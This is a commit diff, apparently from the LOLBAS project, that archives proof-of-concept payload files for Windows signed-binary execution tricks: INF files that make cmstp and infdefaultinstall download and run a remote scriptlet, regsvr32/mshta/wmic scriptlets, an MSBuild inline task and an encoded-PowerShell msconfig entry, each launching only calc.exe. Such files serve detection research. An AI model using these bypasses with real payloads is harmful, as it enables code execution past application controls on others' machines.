Removed MD files, we only use the webportal from now on. All MD files moved to archive

Archive-Old-Version/OSBinaries/Payload/Cmstp.inf

@@ -0,0 +1,14 @@
+[version]
+Signature=$chicago$
+AdvancedINF=2.5
+
+[DefaultInstall_SingleUser]
+UnRegisterOCXs=UnRegisterOCXSection
+
+[UnRegisterOCXSection]
+%11%\scrobj.dll,NI,https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp_calc.sct
+
+[Strings]
+AppAct = "SOFTWARE\Microsoft\Connection Manager"
+ServiceName="Yay"
+ShortSvcName="Yay"

Archive-Old-Version/OSBinaries/Payload/Cmstp_calc.sct

@@ -0,0 +1,23 @@
+<?XML version="1.0"?>
+<scriptlet>
+<registration 
+    progid="PoC"
+    classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
+	<!-- regsvr32 /s /u /i:http://example.com/file.sct scrobj.dll -->
+
+	<!-- .sct files when downloaded, are executed from a path like this -->
+	<!-- Please Note, file extenstion does not matter -->
+	<!-- Though, the name and extension are arbitary.. -->
+	<!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct -->
+	<!-- Based on current research, no registry keys are written, since call "uninstall" -->
+  	<!-- You can either execute locally, or from a url -->
+	<script language="JScript">
+		<![CDATA[
+	    		// calc.exe should launch, this could be any arbitrary code.
+      	   		// What you are hoping to catch is the cmdline, modloads, or network connections, or any variation
+			var r = new ActiveXObject("WScript.Shell").Run("calc.exe");	
+	
+		]]>
+</script>
+</registration>
+</scriptlet>

Archive-Old-Version/OSBinaries/Payload/Evil.xbap

@@ -0,0 +1,8 @@
+private void Button_click(object sender, RoutedEventArgs e)
+{
+	if (RadioButton1.IsChecked == true)
+	{
+		Process.Start("C:\\poc\\evil.exe");
+		MessageBox.Show("BHello.");
+	}
+}

Archive-Old-Version/OSBinaries/Payload/Infdefaultinstall.inf

@@ -0,0 +1,8 @@
+[Version] 
+Signature=$CHICAGO$
+
+[DefaultInstall]
+UnregisterDlls = Squiblydoo
+
+[Squiblydoo]
+11,,scrobj.dll,2,60,https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Infdefaultinstall_calc.sct

Archive-Old-Version/OSBinaries/Payload/Infdefaultinstall_calc.sct

@@ -0,0 +1,16 @@
+<?XML version="1.0"?>
+<scriptlet>
+<registration 
+    progid="PoC"
+    classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
+	<!-- Proof Of Concept - Casey Smith @subTee -->
+	<!--  License: BSD3-Clause -->
+	<script language="JScript">
+		<![CDATA[
+	
+			var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
+	
+		]]>
+</script>
+</registration>
+</scriptlet>

Archive-Old-Version/OSBinaries/Payload/Msbuild.csproj

@@ -0,0 +1,47 @@
+<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <!-- This inline task executes c# code. -->
+  <!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildBypass.csproj -->
+  <!-- Feel free to use a more aggressive class for testing. -->
+  <Target Name="Hello">
+   <FragmentExample />
+   <ClassExample />
+  </Target>
+  <UsingTask
+    TaskName="FragmentExample"
+    TaskFactory="CodeTaskFactory"
+    AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
+    <ParameterGroup/>
+    <Task>
+      <Using Namespace="System" />  
+      <Code Type="Fragment" Language="cs">
+        <![CDATA[
+			    Console.WriteLine("Hello From a Code Fragment");		
+        ]]>
+      </Code>
+    </Task>
+	</UsingTask>
+	<UsingTask
+    TaskName="ClassExample"
+    TaskFactory="CodeTaskFactory"
+    AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
+	<Task>
+	<!-- <Reference Include="System.IO" /> Example Include -->		
+      <Code Type="Class" Language="cs">
+        <![CDATA[
+			using System;
+			using Microsoft.Build.Framework;
+			using Microsoft.Build.Utilities;
+				
+			public class ClassExample :  Task, ITask
+			{
+				public override bool Execute()
+				{
+					Console.WriteLine("Hello From a Class.");
+					return true;
+				}
+			}
+        ]]>
+      </Code>
+    </Task>
+  </UsingTask>
+</Project>

Archive-Old-Version/OSBinaries/Payload/Mshta_calc.sct

@@ -0,0 +1,43 @@
+<?XML version="1.0"?>
+<scriptlet>
+
+<registration
+    description="Bandit"
+    progid="Bandit"
+    version="1.00"
+    classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
+	>
+
+	<!-- regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
+	<!-- DFIR -->
+	<!--		.sct files are downloaded and executed from a path like this -->
+	<!-- Though, the name and extension are arbitary.. -->
+	<!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct -->
+	<!-- Based on current research, no registry keys are written, since call "uninstall" -->
+
+
+	<!-- Proof Of Concept - Casey Smith @subTee -->
+	<script language="JScript">
+		<![CDATA[
+
+			var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
+
+		]]>
+	</script>
+</registration>
+
+<public>
+    <method name="Exec"></method>
+</public>
+<script language="JScript">
+<![CDATA[
+
+	function Exec()
+	{
+		var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
+	}
+
+]]>
+</script>
+
+</scriptlet>

Archive-Old-Version/OSBinaries/Payload/PCW8E57.xml

@@ -0,0 +1,13 @@
+
+<?xml version="1.0" encoding="utf-16"?>
+<Answers Version="1.0">
+	<Interaction ID="IT_LaunchMethod">
+		<Value>ContextMenu</Value>
+	</Interaction>
+	<Interaction ID="IT_SelectProgram">
+		<Value>NotListed</Value>
+	</Interaction>
+	<Interaction ID="IT_BrowseForFile">
+		<Value>C:\Windows\assembly\Exec-Execute.msi</Value>
+	</Interaction>
+</Answers>

Archive-Old-Version/OSBinaries/Payload/Regsvr32_calc.sct

@@ -0,0 +1,23 @@
+<?XML version="1.0"?>
+<scriptlet>
+<registration 
+    progid="PoC"
+    classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
+	<!-- regsvr32 /s /u /i:http://example.com/file.sct scrobj.dll -->
+
+	<!-- .sct files when downloaded, are executed from a path like this -->
+	<!-- Please Note, file extenstion does not matter -->
+	<!-- Though, the name and extension are arbitary.. -->
+	<!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct -->
+	<!-- Based on current research, no registry keys are written, since call "uninstall" -->
+  	<!-- You can either execute locally, or from a url -->
+	<script language="JScript">
+		<![CDATA[
+	    		// calc.exe should launch, this could be any arbitrary code.
+      	   		// What you are hoping to catch is the cmdline, modloads, or network connections, or any variation
+			var r = new ActiveXObject("WScript.Shell").Run("calc.exe");	
+	
+		]]>
+</script>
+</registration>
+</scriptlet>

Archive-Old-Version/OSBinaries/Payload/Wmic_calc.xsl

@@ -0,0 +1,11 @@
+<?xml version='1.0'?>
+<stylesheet
+xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
+xmlns:user="placeholder"
+version="1.0">
+<output method="text"/>
+	<ms:script implements-prefix="user" language="JScript">
+	<![CDATA[
+	var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
+	]]> </ms:script>
+</stylesheet>

Archive-Old-Version/OSBinaries/Payload/file.rsp

@@ -0,0 +1 @@
+REGSVR evil.dll

Archive-Old-Version/OSBinaries/Payload/mscfgtlc.xml

@@ -0,0 +1,4 @@
+<?xml version="1.0" ?>
+<MSCONFIGTOOLS>
+<a NAME="LOLBin" PATH="%windir%\System32\WindowsPowerShell\v1.0\powershell.exe" DEFAULT_OPT="-nop -sta -enc -w 1 <BASE64ENCCOMMAND>" ADV_OPT="-command calc.exe" HELP="LOLBin MSCONFIGTOOLS"/>
+</MSCONFIGTOOLS>